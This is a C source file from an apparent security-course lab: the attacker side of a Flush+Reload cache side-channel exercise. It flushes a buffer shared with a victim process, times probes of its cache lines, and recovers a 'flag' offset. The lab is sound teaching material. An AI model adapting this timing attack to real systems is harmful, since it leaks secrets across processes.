SHD-CacheAttackLab/Part2-FlushReload/attacker.c

57 lines
1.4 KiB
C

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <unistd.h>
#include "util.h"
#define CACHE_HIT_THRESHOLD 200
#define WAIT_TIME 1000
#define AVAR 1664525
#define CVAR 10020107
int main() {
int index = -1;
int flag = -1;
int maybe_flag= -1;
CYCLES time = -1;
int offset = 0;
int new_offset = 0;
// buf is shared between the attacker and the victim
char *buf = allocate_shared_buffer();
// [2.1] TODO: Put your capture-the-flag code here
for(int i = 0; i < 1024; i++) {
clflush((ADDR_PTR)buf + i * 128);
}
for(int i = 0; i < WAIT_TIME; i++);
for(int i = 0; i < 10000; i++) {
new_offset = (AVAR * offset + CVAR) % 1024;
if(offset == new_offset||offset-new_offset==1||offset-new_offset==-1) {
offset = (offset + 712) % 1024;
}
else {
offset = new_offset;
}
time = measure_one_block_access_time((ADDR_PTR)buf + offset * 128);
if(time < CACHE_HIT_THRESHOLD) {
if(offset == maybe_flag) {
flag = offset;
index = i;
break;
}
else {
maybe_flag = offset;
}
}
}
printf("Flag: %d\n", flag);
printf("Time: %d\n", time);
printf("Index: %d\n", index);
deallocate_shared_buffer(buf);
return 0;
}